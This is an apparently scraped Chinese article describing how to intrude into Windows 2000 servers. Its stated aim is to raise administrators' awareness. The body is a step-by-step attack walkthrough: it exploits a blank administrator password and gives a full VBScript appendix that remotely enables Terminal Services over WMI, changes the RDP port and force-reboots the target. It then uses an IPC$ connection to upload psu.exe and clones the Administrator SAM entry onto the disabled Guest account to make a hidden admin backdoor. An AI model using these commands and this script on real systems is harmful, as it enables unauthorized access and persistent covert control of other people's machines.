更改guest帐号权限
IISReset /ReBoot
重启电脑
单位:南京市广播电视大学 作者:韩治
摘 要:本文试图从一个黑客的角度来介绍入侵他人计算机的实现方法和过程,旨在提高Windows 2000等操作系统使用者的警惕,使他们了解其安全管理机制,从而注重和加强网络安全管理。
关键字:踩点、弱口令、克隆帐户(预留后面)
有很多用户都觉得Windows 2000比较好用,因此它拥有很多用户。但在此之中一些用户并不真正了解Windows 2000的安全管理机制。本文试图从一个黑客的角度对其进行简单的探讨。
一、踩点
踩点就是对某台计算机进行入侵前的观察。
假设踩点结束,扫描到了一个装有Windows 2000 Server(或更高版本)计算机,并且存在弱口令,假设弱口令是:管理员帐户(Administrator),密码为空。
弱口令并无详细规范定义,大致可以理解为容易被猜测出来的口令,如:Windows 2000至少存在一个用户是可知的,例如Administrator(管理员帐户)和Guest(默认是被系统禁用的)。所以攻击者只需要测试口令,且大部分人由于出于各种原因可能没有设置口令或者是使用简单的数字或日期作为口令,然而现在有很多软件可以在短时间内进行破译,而且破译者不需要拥有很高的学术或技巧。
二、入侵
在本机运行CMD,给它开个终端,命令如下:
cscript *.vbe 192.168.0.1 administrator "" 3389 /fr
解释:cscript *.vbe这是命令(*代表任意字符,因为此VBscript脚本程序是自己编的,可以自己任意起名字。程序见附录。),后面是有漏洞计算机的IP地址,然后是它的管理员帐户名称,接着是帐户密码,因为192.168.0.1这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口(你可以任意设置终端的端口,但默认端口是3389),/fr是重启命令(强制重启,也可以/r:普通重启,建议用强制重启命令)。
终端服务器只在Windows 2000 Server以上的版本(包括Server)才有,PRO是不行的,此版本可以检测服务器的版本,如果是PRO,则提示你是否退出安装!
然后用Ping命令连续测试它(ping 192.168.0.1 –t),看其是否重启。等重启完成,就可以进入下一步。
三、克隆帐户(预留后面)
在本机运行CMD,到DOS下,建立IPC$连接。
net use //192.168.0.1/ipc$ "" /user:"administrator"
命令完成后,我们把psu上传到目标机的c:/Winnt/system32目录下。
copy psu.exe //192.168.0.1/admin$/system32
上传完毕后,开始做后门帐户。
用连接工具连接终端,假设guest用户被禁用,我们就是要利用guest做后门帐户!
在该服务器运行CMD,在命令行下输入:
psu -p regedit -i PID
这里解释一下,后面的PID是系统进程winlogon的值,我们在任务栏下点鼠标右键,看任务管理器,看进程选项卡,找到winlogon的进程,后面的数值就是winlogon的pid值,假设是1234,那么,命令就是这样psu -p regedit -i 1234。
这样直接打开注册表,就可以读取本地sam的信息。
打开键值HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users
下面的就是本地的用户信息了,我们要做的是把禁用的guest克隆成管理员权限的帐户。
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names
查看administrator的类型,是if4,再看guest的类型,是if5,知道类型后,打开
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4
这个值,双击右侧的F,把里面所有的字符复制下来,然后打开
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F5
双击右侧的F,把刚复制的粘贴到里面!
做好了以后,把
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F5
和
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/Guest
这两个键值导出,导出后把那两个键值删除!然后再导入进来!关闭注册表。
打开CMD,在命令行下输入:
net user guest password(这条命令是给guest设置密码,后面的password就是密码)
然后输入:
net user guest /active:y
这命令是激活guest帐户,然后将其禁用。
net user guest /active:n
(上面的三行命令必须在DOS下执行)
打开计算机管理,看用户,guest帐户还是被禁用的。但此时它已经拥有了管理员权限!
而且并不在管理员组里显示,还可以登陆终端,与Administrator帐户是一样的。
附录
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
if wscript.arguments.count<3 then
usage()
wscript.echo "Not enough parameters."
wscript.quit
end if
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
if wscript.arguments.count>3 then
port=wscript.arguments(3)
else
port=3389
end if
if not isnumeric(port) or port<1 or port>65000 then
wscript.echo "The number of port is error."
wscript.quit
end if
if wscript.arguments.count>4 then
reboot=wscript.arguments(4)
else
reboot=""
end if
usage()
outstreem.write "Conneting "&ipaddress&" ...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
showerror(err.number)
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true
outstreem.write "Checking OS type...."
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
for each objinstoscaption in colinstoscaption
if instr(objinstoscaption.caption,"Server")>0 then
wscript.echo "OK!"
else
wscript.echo "OS type is "&objinstoscaption.caption
outstreem.write "Do you want to cancel setup?[y/n]"
strcancel=instreem.readline
if lcase(strcancel)<>"n" then wscript.quit
end if
next
outstreem.write "Writing into registry ...."
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
HKLM=&h80000002
HKU=&h80000003
with objinstreg
.createkey ,"SOFTWARE/Microsoft/Windows/CurrentVersion/netcache"
.setdwordvalue HKLM,"SOFTWARE/Microsoft/Windows/CurrentVersion/netcache","Enabled",0
.createkey HKLM,"SOFTWARE/Policies/Microsoft/Windows/Installer"
.setdwordvalue HKLM,"SOFTWARE/Policies/Microsoft/Windows/Installer","EnableAdminTSRemote",1
.setdwordvalue HKLM,"SYSTEM/CurrentControlSet/Control/Terminal Server","TSEnabled",1
.setdwordvalue HKLM,"SYSTEM/CurrentControlSet/Services/TermDD","Start",2
.setdwordvalue HKLM,"SYSTEM/CurrentControlSet/Services/TermService","Start",2
.setstringvalue HKU,".DEFAULT/Keyboard Layout/Toggle","Hotkey","1"
.setdwordvalue HKLM,"SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp","PortNumber",port
end with
showerror(err.number)
rebt=lcase(reboot)
flag=0
if rebt="/r" or rebt="-r" or rebt="/r" then flag=2
if rebt="/fr" or rebt="-fr" or rebt="/fr" then flag=6
if flag<>0 then
outstreem.write "Now, reboot target...."
strwqlquery="select * from win32_operatingsystem where primary='true'"
set colinstances=objswbemservices.execquery(strwqlquery)
for each objinstance in colinstances
objinstance.win32shutdown(flag)
next
showerror(err.number)
else
wscript.echo "You need to reboot target."&vbcrlf&"Then,"
end if
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"
function showerror(errornumber)
if errornumber Then
wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
if err.description <> "" then
wscript.echo "Error description: "&err.description&"."
end if
wscript.quit
else
wscript.echo "OK!"
end if
end function
function usage()
wscript.echo string(80,"-")
wscript.echo "此为打开Windows 2000终端的脚本。版权属于:韩治"
wscript.echo "主页www.I94Self.com;E_mail:I94Self@Hotmail.com"
wscript.echo "用法如下:"
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"
wscript.echo "port: 默认是3389."
wscript.echo "/r: 普通重启"
wscript.echo "/fr: 强行重启"
wscript.echo string(80,"-")&vbcrlf
end function
注:1、此脚本程序带有及强的攻击性,请不要用于非法用途,否则后果自负。
2、因为此程序有修改注册表的命令,所以杀毒软件可能会认为是黑客程序而提醒您。
更改guest帐号权限相关推荐
- GUEST帐号“反客为主”
GUEST帐号"反客为主" 众所周知,GUEST帐号默认是没有权限创建一个管理员帐号的.可是偏偏就有这么一个方法让其当了回"老大",简单几步就夺下了系统的最高权 ...
- windows server2012安全配置—停用Guest帐号的方法
我按照度娘的方法停用Guest帐号:鼠标右击左下角的图标,在弹出快捷菜单选择"计算机管理"→"系统工具"→"本地用户和组",找不到" ...
- 访问共享目录,取消默认使用Guest帐号登录的解决方法
默认情况 下,Windows XP的本地安全设置要求进行网络访问的用户全部采用来宾方式.同时,在Windows XP安全策略的用户权利指派中又禁止Guest用户通过网络访问系统.这样两条相互矛盾的安全 ...
- html网页id怎么改成名字,IG 改名字:教你如何更改 Instagram 帐号名称 ID 及个人档案姓名...
如果你当时办 Instagram 时乱取用户名称 ID,或者你不想让某人找到你的 IG 帐号,那么我们都可以透过「改名字」这招来实现,无论你想更改 IG 帐号 ID,或者是想更改个人档案上的姓名都可以 ...
- (转)NAS黑群晖DSM6.17及以下开启ROOT登录帐号权限
转:https://aisoa.cn/post-2925.html 群晖DSM6.0以后就封锁了ROOT权限登录,导致无法使用WinSCP使用root登录修改文件(使用admin账号是没有权限的). ...
- java jco连接sap帐号权限设定,Java连接SAP的JCO调用RFC配置
第一步:下载librfc32.dll和sapjcorfc.dll文件,版本分别为6405.5.132.5092 - 6400.132.12.49905 第二步:将下载的两个DLL文件放在的window ...
- 让用户更改自己的帐号
一般情况之下,只允许用户更改自己的密码与邮箱.下面方法设法让用户更改自己的帐号: 首先参考表[Users]: 写一个存储过程,存储过程中有一个自定义函数udf_ExclusionAccount,请参考 ...
- Windows Server 2008 R2中的托管服务帐号(MSA)-冯立亮
Windows Server 2008 R2中的托管服务帐号(MSA) 在现代化的企业中,计算机网络占据了重中之重的地位,越来越多的企业核心业务依附于计算机网络架构,例如:往来电子邮件,文件共享,即时 ...
- 创建永远隐藏的隐藏帐号
前段时间比较流行的一句话"肉机"其实要想控制远端的计算机,那我想就少不了隐藏用户帐号的问题了,其实创建隐藏用户帐号还是比较简单的,现在我就把创建隐藏用户帐号告诉大家.其实每一个用户 ...
最新文章
- android 背景切换动画效果代码,关于Android shape gradient背景渐变
- jupyter notebook修改默认工作目录
- java单元测试覆盖率统计eclemma
- 07-CA/TA编程:rsakey demo
- java8新特新:接口流-Stream()接口和所有方法(map,foreach,filter,count,distinct,limit,collect,skip,sorted)
- excel mysql实时交换数据_Excel与数据库的数据交互
- js里apply方法的简单实例
- 二维数组:随机生产,遍历,判断两个数组一维二维长度,和内容是否一致
- 转:DotNET企业架构应用实践-架构师成长之路-如何成为优秀架构师
- idft重建图像 matlab_不可见成为可见!超材料和 AI 融合,洛桑联邦理工破译了声音图像...
- 世界500强面试题(趣味智力测试题)
- python 指定值的位置_python数组查找某个值的位置
- winform控件之MonthCalendar
- 屏蔽烦人的百度搜索热点
- 重构改善既有代码的设计 --原则篇
- Mysql分页Limt
- matlab 有一函数 _写一程序_输入自变量的值_输出函数值.,第2讲 MATLAB入门1_数学建模_ppt_大学课件预览_高等教育资讯网...
- 刘强东:我不是中国互联网“坏孩子”
- B70极路由4增强版安装frps
- JSP对接国际验证码接口DEMO示例
热门文章
- 中国地质大学计算机学院保研率,2020年中国地质大学(北京)保研率是多少
- LinuxProbe学习笔记(十三)
- 怎么在Arcgis中提取多个坐标点的dem值(高程)
- 怎么提高公文写作水平?原来这就是公文参考模版
- Golang字符串拼接的方法
- 服务器2012系统用什么更新驱动程序,服务堆栈更新程序适用于 Windows 8 和 Windows Server 2012...
- 新用户注册之验证码短信、语音解决方案
- 【各种转换】数组转换成字符串,集合转换成字符串,字符串转集合
- Matlab 主曲率、平均曲率、高斯曲率
- 拖拖拽拽设计门户首页—Jeecg门户设计器,你想象不到的简单